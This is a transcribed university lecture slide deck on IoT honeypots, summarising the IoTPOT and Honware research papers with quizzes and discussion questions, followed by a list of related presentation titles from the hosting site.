lecture 5 iot honeypots
play

Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, - PowerPoint PPT Presentation

Mar 26, 2023 •534 likes •926 views

Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, Ramin Yazdani, and Etienne Khan University of Twente | May 20, 2020 Lab assignment MUD descriptions: youll need to generate them yourselves, tools are available IoT

  1. Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, Ramin Yazdani, and Etienne Khan University of Twente | May 20, 2020

  2. Lab assignment • MUD descriptions: you’ll need to generate them yourselves, tools are available • IoT devices: you’ll need to work with the actual hardware, no emulations (unless as an extra) • Use IoT devices without a browser-like interface, such as light bulbs, audio speakers, doorbells • Do not use multi-purpose devices like tablets, phones, laptops • At least 2 IoT devices per group of 3 and at least 3 devices per group of 4 • Etienne Khan available for assistance

  3. Paper summaries • You must have handed in your two summaries BEFORE this lecture • You can use the summaries during the oral exam (“open book”) • You cannot complete SSI without submitting 12 paper summaries!

  4. Interactive Lecture • Goal: enable you to learn from each other and further increase your understanding of the papers (contributes to preparing yourself for the oral exam) • Format: 1. We’ll ask someone to provide their verbal summary of the paper 2. 5-slide(-ish) summary by teachers (put any questions in the chat) 3. Questions: discussion starters and fact questions 4. Discussion (use your mic) 5. We may ask someone specific to start the discussion • Experimental format resulting from Corona pandemic, please provide feedback!

  5. Today’s papers Are about measuring IoT botnets • [IoTPOT ] Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow. “IoTPOT: Analysing the Rise of IoT Compromises”. 9th USENIX Workshop on Offensive Technologies (co-located with USENIX Sec ’15), WOOT ’15, Washington, DC, https://christian-rossow.de/publications/iotpot-woot2015.pdf • [ Honware ] Vetterl, Alexander, and Richard Clayton. “Honware: A virtual honeypot framework for capturing CPE and IoT zero days.” Symposium on Electronic Crime Research (eCrime). IEEE. 2019. https://www.cl.cam.ac.uk/~amv42/papers/vetterl-clayton-honware-virtual- honeypot-framework-ecrime-19.pdf

  6. “IoTPOT: Analysing the Rise of IoT Compromises”, 9th USENIX Workshop on Offensive Technologies (WOOT), 2015

  7. Darknet monitoring 270.000 IP’s Connect back 23/80 TCP & collect banners.

  8. Darknet monitoring (2)

  9. Darknet monitoring (2)

  10. Quiz Why is a darknet useful for IoT malware research? A: Malware runs better, because it’s from the dark side B: No legitimate traffic C: No legal problems because a darknet is not managed by any company D: It has residual trust from previous use

  11. IoT POT Running on 165 IP addresses 5 weeks running time Telnet attack stages: (1) Intrusion; (2) Infection; (3) Monetization. Remember Mirai? Credentials in Fixed/Random order (1) 6 patterns of commands (2) distinguished

  12. ‘Coordinated intrusion’

  13. IoTPOT & IoTBOX

  14. Quiz What would an operator of an IoTPOT honeypot need to do to support Hajime? A: Add support for MIPS CPU architecture B: Track DHT (P2P) communications C: Expose many vulnerabilities D: Run the honeypot in different subnets

  15. IoTBOX Sandbox with 8 CPU architectures Limit outgoing to DNS/HTTP 5ppm Telnet to Dummy server

  16. Results

  17. Results

  18. Quiz Most important next-step A: More CPU architectures B: Passthrough and monitor C&C traffic C: Standardized botnet profiles for sharing between organizations D: Running on real (IoT) hardware

  19. Key takeaways IoT world heterogeneous => honeypots more complex High-interaction needed to get useful results Require many (!) IP addresses to catch scans

  20. Discussion Þ What is IoT about IoTPOT? Þ Ethical considerations in running a honeypot? Þ How would you improve IoTPOT? Þ Others means to achieve the same?

  21. Honware: A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days Vetterl, A., & Clayton, R. (2019, November). Honware: A virtual honeypot framework for capturing CPE and IoT zero days. In Symposium on Electronic Crime Research (eCrime). IEEE .

  22. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● We’ve seen IoTPOT as a generic example, can we improve on that model? Specialized honeypots can be built for known malware (leaked Mirai sourcecode) ○ But this might not capture attack traffic of unknown derivates (e.g. Yowai/Hakai) ○ ● Malware engineers can easily scan the whole IPv4 Internet to look for vulnerable devices and quickly infect them. ● This means defenders need to scale fast too IoTPOT à Hardcoded answers (and limited sandbox), Firmadyne à Not setup for ○ network traffic, SIPHON à physical devices ● Using original firmware as a basis for honeypots

  23. Quiz 1 How long does it take to scan the whole IPv4 space? Around 5 minutes A. Around 60 minutes B. Around 1 day C. Around 7 days D.

  24. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● Using original firmware as a honeypot basis Automated firmware extraction with Binwalk ○ Customizing the kernel to allow logging & emulating proprietary hardware ○ Signal interception (signals are a form of inter-process communication (IPC)) ○ Module loading disabled ○ NVRAM is not available and thus has to be emulated ○ Network configuration (adding interfaces) ○ Emulation self-check (am I reachable via ping?) ○

  25. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  26. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● Not required, but fun: ● Reverse engineering my router's firmware with binwalk ● https://embeddedbits.org/reverse-engineering-router-firmware-with-binwalk/ ● Playing with signals ● http://www.it.uu.se/education/course/homepage/os/vt18/module- 2/signals/

  27. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● How does this system compare to the alternative (Firmadyne)? ● Out of 8387 available firmwares, 4650 could be successfully extracted (55.4%) Possibly due to having weaker constraints on the size of the extracted image ○ ● From the 4650 extracted firmware images, 1903 responded to ICMP traffic (40.9%). Firmadyne only achieved this for 460 firmware images (15.8%) Likely due to the kernel customizations, and handling of crashes ○

  28. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  29. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  30. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● How does this system compare to the real deal (hardware in the wild)? ● Fingerprinting of honeypots is an ongoing concern

  31. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  32. Quiz 2 Hosting the honeypots in the cloud can aid attackers in the fingerprinting process A. True False B.

  33. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● Real world results: fast UPnPHunter took a research team 1 month to reverse engineer, Honware 1. detected the complete attack within 24 hours DNS hijack, a previously unknown attack 2. UPnPProxy 3. Mirai variants, target port 80 (HTTP) instead of 23 (Telnet) 4. Detected malware samples were unknown to the wider community (Virustotal) ●

  34. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  35. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days ● At the beginning we were not able to capture a valid sample as the honeypot needs to be able to simulate the above scenarios. We had to tweak and customize our honeypot quite a few times, then finally in Oct, we got it right and successfully tricked the botnet to send us the sample (we call it BCMUPnP_Hunter). ● https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home- routers-to-email-spammers-en/ ● Original slides by the authors of the paper: ● https://www.cl.cam.ac.uk/~amv42/papers/vetterl-clayton-honware-virtual- honeypot-framework-ecrime-19-slides.pdf

  36. Conclusion Honware uses real services/applications which are shipped with the device ● In addition to that, the native configuration files are loaded ○ Better than existing emulation strategies in all areas ● Extraction, network reachability, listening services ○ Capable of detecting vulnerabilities at scale ● Rapid emulation cuts the attackers’ ability to exploit vulnerabilities for considerable time ○

  37. Discussion of honeypot frameworks What do you think of the proposed frameworks today? Would you change 1. something and why? Let’s link this back to the lecture of governance and regulation: 2. Should governments only allow the sale of an IoT device, if they can run the firmware on a testbench?

  38. Volg ons SIDN.nl Discussion & feedback @SIDN SIDN Next lecture: Wed May 27, 10:45-12:30 Topic: IoT edge security systems

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Intrusion Detection w ith Motivation Honeypots What is a honeypot? Types of honeypots

Intrusion Detection w ith Motivation Honeypots What is a honeypot? Types of honeypots

Overview Intrusion Detection w ith Motivation Honeypots What is a honeypot? Types of honeypots What can you do with them? Claire OShea Problems with honeypots COMP 290 Spring 2005 Overview Motivation Examples of

645 views • 15 slides
Nomadic Honeypots A Novel Concept for Smartphone Honeypots Steffen Liebergeld , Matthias Lange and

Nomadic Honeypots A Novel Concept for Smartphone Honeypots Steffen Liebergeld , Matthias Lange and

Nomadic Honeypots A Novel Concept for Smartphone Honeypots Steffen Liebergeld , Matthias Lange and Collin Mulliner Security in Telecommunications Technische Universit at Berlin, Germany { steffen,mlange } @sec.t-labs.tu-berlin.de Northeastern

713 views • 11 slides
INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS JOSH PYORRE Security Researcher Threat Analyst at NASA Threat Analyst at Mandiant @joshpyorre HONEYPOTS CURRENTLY IN USE

1.25k views • 96 slides
Honeypots Mathias Gibbens Harsha vardhan Rajendran April 22, 2012 Mathias Gibbens, Harsha

Honeypots Mathias Gibbens Harsha vardhan Rajendran April 22, 2012 Mathias Gibbens, Harsha

Honeypots Mathias Gibbens Harsha vardhan Rajendran April 22, 2012 Mathias Gibbens, Harsha vardhan Rajendran () Honeypots April 22, 2012 1 / 28 Outline Introduction 1 History 2 Types of honeypots 3 Deception techniques using Honeypots

632 views • 61 slides
Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. !

Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. !

Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. ! Founder, Honeynet Project & Moderator, honeypot mailing list ! Author, Honeypots: Tracking Hackers & Co- author, Know Your Enemy ! Work

676 views • 52 slides
Towards High-Interaction Virtual ICS Honeypots-in-a-Box D ANIELE A NTONIOLI A NAND A GRAWAL N. O.

Towards High-Interaction Virtual ICS Honeypots-in-a-Box D ANIELE A NTONIOLI A NAND A GRAWAL N. O.

CPS-SPC 16 @ Vienna AU Towards High-Interaction Virtual ICS Honeypots-in-a-Box D ANIELE A NTONIOLI A NAND A GRAWAL N. O. T IPPENHAUER daniele_antonioli@sutd.edu.sg Towards High-Interaction Virtual ICS Honeypots-in-a-Box 1 Overview In this

922 views • 25 slides
Honeypots as a Security Honeypots as a Security Mechanism Mechanism Presenter: merson Virti

Honeypots as a Security Honeypots as a Security Mechanism Mechanism Presenter: merson Virti

Monitoring, Attack Detection and Mitigation Monitoring, Attack Detection and Mitigation MonAM 2006 MonAM 2006 Honeypots as a Security Honeypots as a Security Mechanism Mechanism Presenter: merson Virti Authors: merson Virti, Liane

474 views • 16 slides
Research Project 2: Metasploit-able Honeypots Research questions Introduction Approach Wouter

Research Project 2: Metasploit-able Honeypots Research questions Introduction Approach Wouter

Metasploit- able Honeypots Wouter Katz Research Project 2: Metasploit-able Honeypots Research questions Introduction Approach Wouter Katz Results wouter.katz@os3.nl Conclusions References University of Amsterdam July 4th 2013 Wouter

623 views • 30 slides
Bitter Harvest: S ystematically Fingerprinting Low- and Medium- interaction Honeypots at

Bitter Harvest: S ystematically Fingerprinting Low- and Medium- interaction Honeypots at

Bitter Harvest: S ystematically Fingerprinting Low- and Medium- interaction Honeypots at Internet S cale Alexander Vet t erl and Richard Clayt on University of Cambridge 12th USENIX Workshop on Offensive Technologies August 13-14, 2018

481 views • 21 slides
Honeypots against Worms 101 Honeypots against Worms 101 Black Hat Asia 2003 oudot at oudot at

Honeypots against Worms 101 Honeypots against Worms 101 Black Hat Asia 2003 oudot at oudot at

Honeypots against Worms 101 Honeypots against Worms 101 Black Hat Asia 2003 oudot at oudot at rstack rstack.org .org http://www.rstack http://www. rstack.org/ .org/oudot oudot team rstack.org Overview Overview 1. About Worms

733 views • 51 slides
Io IoT Ho T Hone neyBot yBot Haris emi and Saa Mrdovi Cryptacus: Workshop and MC

Io IoT Ho T Hone neyBot yBot Haris emi and Saa Mrdovi Cryptacus: Workshop and MC

Io IoT Ho T Hone neyBot yBot Haris emi and Saa Mrdovi Cryptacus: Workshop and MC meeting Nijmegen, Netherlands, 2017 Honeypots Honeypots Emulation of a network resource Built to be discovered, attacked and compromised

497 views • 18 slides
We know where you live Systematically Fingerprinting Low- and Medium-interaction Honeypots at

We know where you live Systematically Fingerprinting Low- and Medium-interaction Honeypots at

We know where you live Systematically Fingerprinting Low- and Medium-interaction Honeypots at Internet Scale Alexander Vetterl University of Cambridge alexander.vetterl@cl.cam.ac.uk Introduction Honeypot s: A resource whose value is

477 views • 19 slides
Counting Outdated Honeypots: Legal and Useful Alexander Vetterl * , Richard Clayton * and Ian

Counting Outdated Honeypots: Legal and Useful Alexander Vetterl * , Richard Clayton * and Ian

Counting Outdated Honeypots: Legal and Useful Alexander Vetterl * , Richard Clayton * and Ian Walden *University of Cambridge, Queen Mary University of London 4th International Workshop on Traffic Measurements for Cybersecurity May 23,

423 views • 17 slides
Securing networks with Honeypots Motivation Scenario : Web server Internet SSH How to

Securing networks with Honeypots Motivation Scenario : Web server Internet SSH How to

Benjamin Braun, Klemens Mang Securing networks with Honeypots Motivation Scenario : Web server Internet SSH How to detect attackers accessing your service? How to analyze attack patterns? How to detect yet unknown attack

246 views • 13 slides
Honeypot technologies 2006 First Conference / tutorial Junes 2006

Honeypot technologies 2006 First Conference / tutorial Junes 2006

Honeypot technologies 2006 First Conference / tutorial Junes 2006 {Franck.Veysset,Laurent.Butti}@orange-ft.com D1 -June 2006 Agenda s Origins and background s Different kinds of honeypot Q High interaction honeypots Q Low interaction honeypots

1.5k views • 112 slides
Empirical Analysis and Statistical Modelling of Attack Processes based on Honeypots M. Kaniche

Empirical Analysis and Statistical Modelling of Attack Processes based on Honeypots M. Kaniche

Empirical Analysis and Statistical Modelling of Attack Processes based on Honeypots M. Kaniche 1 , E. Alata 1 , V.Nicomette 1 , Y. Deswarte 1 , M. Dacier 2 LAAS-CNRS 1 , Eurecom 2 Mohamed.Kaaniche@laas.fr ACI Scurit &

409 views • 17 slides
Active 802.11 Fingerprinting: gibberish and secret handshakes to know your AP Sergey

Active 802.11 Fingerprinting: gibberish and secret handshakes to know your AP Sergey

Active 802.11 Fingerprinting: gibberish and secret handshakes to know your AP Sergey Bratus, Cory Cornelius, Daniel Peebles Dartmouth College Shmoocon 2008 This talk in 5 minutes (1) How it started? TC7, Johnny Cache:

426 views • 23 slides
Hot or Not: Fingerprinting hosts through clock skew ^ c = 95, min s ^ ( t ) = 0.11, max s ^ ( t

Hot or Not: Fingerprinting hosts through clock skew ^ c = 95, min s ^ ( t ) = 0.11, max s ^ ( t

Hot or Not: Fingerprinting hosts through clock skew ^ c = 95, min s ^ ( t ) = 0.11, max s ^ ( t ) = 0.22 ppm s 0 39.0

699 views • 38 slides
Scrutinizing a Country using Passive DNS and Picviz or how to analyze big dataset without loosing

Scrutinizing a Country using Passive DNS and Picviz or how to analyze big dataset without loosing

Scrutinizing a Country using Passive DNS and Picviz or how to analyze big dataset without loosing your mind Sebastien Tricaud, Alexandre Dulaunoy March 10, 2012 Disclaimer Passive DNS is a technique to collect only valid answers from

772 views • 38 slides
Intrusion Detection Cyber Security Spring 2010 Reading material Chapter 25 from Computer

Intrusion Detection Cyber Security Spring 2010 Reading material Chapter 25 from Computer

Intrusion Detection Cyber Security Spring 2010 Reading material Chapter 25 from Computer Security, Matt Bishop Snort http://snort.org Distributed IDS DShield http://dshield.org Dark address space

590 views • 21 slides
P ANDAcap A Framework for Streamlining Collection of Full-System Traces Manolis Stamatogiannakis

P ANDAcap A Framework for Streamlining Collection of Full-System Traces Manolis Stamatogiannakis

P ANDAcap A Framework for Streamlining Collection of Full-System Traces Manolis Stamatogiannakis , Herbert Bos, and Paul Groth April 27, 2020 EuroSec 2020 PANDAcap 1 In this Talk Motivation for this work Overview of

1.17k views • 35 slides
Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina Rente { jmfranco, frente } at dei.uc.pt Software and System Engineering Research Group FCT University of Coimbra Agenda Agenda

378 views • 16 slides
Secure and Private Smart Grid: The SPEAR Architecture Panagiotis Radoglou-Grammatikis

Secure and Private Smart Grid: The SPEAR Architecture Panagiotis Radoglou-Grammatikis

Secure and Private Smart Grid: The SPEAR Architecture Panagiotis Radoglou-Grammatikis University of Western Macedonia pradoglou@uowm.gr Nets Netsoft 2020 2020 Under SPEAR Project A u t h o r s UOWM TECNALIA TE SID SIDROCO CERTH

550 views • 20 slides
Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon

Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon

Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon 12 Ramin Sadre 1 SIGCOMM-WTMC, 20th August 2018 1 Institute of Information and Communication Technologies, Electronics and Applied Mathematics

561 views • 17 slides

More recommend